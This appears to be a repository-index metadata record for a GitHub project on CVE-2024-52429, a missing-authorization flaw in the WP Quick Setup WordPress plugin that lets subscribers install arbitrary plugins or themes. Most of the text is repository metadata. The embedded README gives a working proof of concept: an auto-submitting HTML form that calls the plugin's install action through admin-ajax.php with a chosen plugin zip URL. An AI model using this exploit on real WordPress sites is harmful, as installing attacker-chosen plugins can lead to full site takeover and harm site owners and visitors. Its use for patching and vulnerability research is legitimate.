{"id":22874288,"url":"https://github.com/randomrobbiebf/cve-2024-52429","last_synced_at":"2026-01-07T23:48:50.293Z","repository":{"id":264161235,"uuid":"892550666","full_name":"RandomRobbieBF/CVE-2024-52429","owner":"RandomRobbieBF","description":"WP Quick Setup \u003c= 2.0 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin/Theme Installation","archived":false,"fork":false,"pushed_at":"2024-11-22T10:28:33.000Z","size":2,"stargazers_count":1,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-02-06T18:52:10.294Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/RandomRobbieBF.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-11-22T10:26:55.000Z","updated_at":"2024-11-27T09:45:27.000Z","dependencies_parsed_at":"2024-11-22T11:36:21.937Z","dependency_job_id":null,"html_url":"https://github.com/RandomRobbieBF/CVE-2024-52429","commit_stats":null,"previous_names":["randomrobbiebf/cve-2024-52429"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2024-52429","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2024-52429/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2024-52429/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2024-52429/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/RandomRobbieBF","download_url":"https://codeload.github.com/RandomRobbieBF/CVE-2024-52429/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":246472580,"owners_count":20783225,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-12-13T14:34:38.373Z","updated_at":"2026-01-07T23:48:50.262Z","avatar_url":"https://github.com/RandomRobbieBF.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# CVE-2024-52429\nWP Quick Setup \u0026lt;= 2.0 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin/Theme Installation\n\n# Description: \n\nThe WP Quick Setup plugin for WordPress is vulnerable to unauthorized plugin and theme installation due to a missing capability check on a function in all versions up to, and including, 2.0. This makes it \n\n```\nType: plugin\nCVSS Score: 8.8\nCVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\nCVE: CVE-2024-52429\n```\n\nPOC\n---\n\nLogin as a subscriber then run this html\n\n```\n\u003chtml\u003e\n  \u003cbody\u003e\n    \u003cform action=\"https://wp-dev.ddev.site/wp-admin/admin-ajax.php\" method=\"POST\"\u003e\n      \u003cinput type=\"hidden\" name=\"action\" value=\"wes\u0026#95;install\u0026#95;plugins\" /\u003e\n      \u003cinput type=\"hidden\" name=\"plugin\u0026#95;urls\u0026#91;\u0026#93;\" value=\"https\u0026#58;\u0026#47;\u0026#47;downloads\u0026#46;wordpress\u0026#46;org\u0026#47;plugin\u0026#47;wdes\u0026#45;responsive\u0026#45;mobile\u0026#45;menu\u0026#46;zip\" /\u003e\n      \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n    \u003c/form\u003e\n    \u003cscript\u003e\n      history.pushState('', '', '/');\n      document.forms[0].submit();\n    \u003c/script\u003e\n  \u003c/body\u003e\n\u003c/html\u003e\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frandomrobbiebf%2Fcve-2024-52429","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Frandomrobbiebf%2Fcve-2024-52429","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frandomrobbiebf%2Fcve-2024-52429/lists"}